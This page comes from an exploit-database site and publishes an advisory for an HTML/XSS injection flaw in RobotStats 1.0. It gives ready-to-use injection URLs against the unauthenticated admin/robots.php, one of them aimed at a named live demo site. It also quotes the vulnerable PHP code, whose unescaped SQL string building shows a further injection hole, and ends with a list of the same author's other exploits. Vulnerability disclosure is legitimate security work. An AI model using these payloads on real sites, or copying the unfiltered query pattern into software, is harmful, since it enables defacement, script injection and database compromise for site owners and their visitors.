Search for hundreds of thousands of exploits

"RobotStats 1.0 - HTML Injection"

Author

Exploit author

"ZoRLu Bugrahan"

Platform

Exploit platform

aix

Release date

Exploit published date

2014-11-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
# Title         : RobotStats v1.0 HTML Injection Vulnerability
# Author        : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home          : http://milw00rm.com / its online
# Twitter	    : https://twitter.com/milw00rm or @milw00rm
# Date          : 22.11.2014
# Demo		    : http://alpesoiseaux.free.fr/robotstats/
# Download 	    : http://www.robotstats.com/en/robotstats.zip
# Thks          : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )

Desc.:
no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
and no any filter for html code at robots.lib.php. you can inject your html code or xss code.

html inj.:

target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=

after you go here:

target.com/robotstats/info-robot.php?robot=(robot id)

or

target.com/robotstats/admin/robots.php you will see your html page

analysis: (/admin/robots.php)

include "robots.lib.php"; //line 26

else if ($rub == "ajouter")
{
  updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url); //line 65 (we will be analysis to robots.lib.php for line)
}

analysis: (/admin/robots.lib.php)

you look code. you will see blank control for "name" and "user agent" but will'nt see any filter for inject (// look line 203 no any filter) no any control or filter for code inject.

function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detection, $descr_fr, $descr_en, $url)
//line 163 (remember function line 65 in robots.php)
{
  global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;

  // dans tous les cas :
  echo "<p class='normal'><a class='erreur'> ";
  $msg = "";

  // test du nom
  if ($nom == '')  //line 172 control of blank or not blank
  {
    $msg = $RS_LANG["BadRobotName"];
  }

  // test selon le mode de detection
  if ($detection == $RS_DETECTION_USER_AGENT) //line 178 control of your "detection mode" choice
  {
    if ($user_agent == '') //line 180 control of blank or not blank
    {
      $msg = $RS_LANG["BadUserAgent"];
    }
  }
  else if ($detection == $RS_DETECTION_IP)  //line 185 control of your "detection mode" choice
  {
    if ( ($ip1 == '') && ($ip2 == '') )  //line 187 control of your "ip1 and ip2" choice
    {
      $msg = $RS_LANG["IPNotSpecified"];
    }
  }
  else
  {
    $msg = $RS_LANG["BadDetectionMode"];
  }

  if ($msg != "")
  {
    echo $msg;
  }
  else
  {
    $liste_champs  = "nom, actif, user_agent, ip1, ip2, detection, descr_fr, descr_en, url";      // line 203 no any filter
    $liste_valeurs = "\"$nom\", \"$actif\", \"$user_agent\", \"$ip1\", \"$ip2\", \"$detection\", \"$descr_fr\", \"$descr_en\", \"$url\"";
    if ($robot > 0) // cas d'une modification et non d'un ajout       //line 205 control of your choice "wanna update any bot or add new bot"
    {
      $liste_champs  .= ", id";
      $liste_valeurs .= ", '$robot'";
      $sql = "REPLACE INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
      $res = mysql_query($sql) or erreurServeurMySQL($sql);
      echo $RS_LANG["RobotUpdated"];
    }
    else
    {
      $sql = "INSERT INTO ".$RS_TABLE_ROBOTS." ($liste_champs) VALUES ($liste_valeurs)";
      $res = mysql_query($sql) or erreurServeurMySQL($sql);
      echo $RS_LANG["RobotAdded"];
    }
  }

for demo:

http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=

after you go here:

http://alpesoiseaux.free.fr/robotstats/info-robot.php?robot=(robot id)

or 

http://alpesoiseaux.free.fr/robotstats/admin/robots.php

you will see your html page
Release DateTitleTypePlatformAuthor
2014-12-09"Flat Calendar 1.1 - HTML Injection"webappsphp"ZoRLu Bugrahan"
2014-11-24"RobotStats 1.0 - HTML Injection"dosaix"ZoRLu Bugrahan"
2014-11-24"RobotStats 1.0 - 'robot' SQL Injection"webappsphp"ZoRLu Bugrahan"
2014-11-17"Maarch LetterBox 2.8 - (Authentication Bypass) Insecure Cookies"webappsphp"ZoRLu Bugrahan"
2014-10-31"Who's Who Script - Cross-Site Request Forgery (Add Admin)"webappsphp"ZoRLu Bugrahan"
2014-10-29"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow (Denial of Service) (PoC) EIP Overwrite"doswindows"ZoRLu Bugrahan"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/35342/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.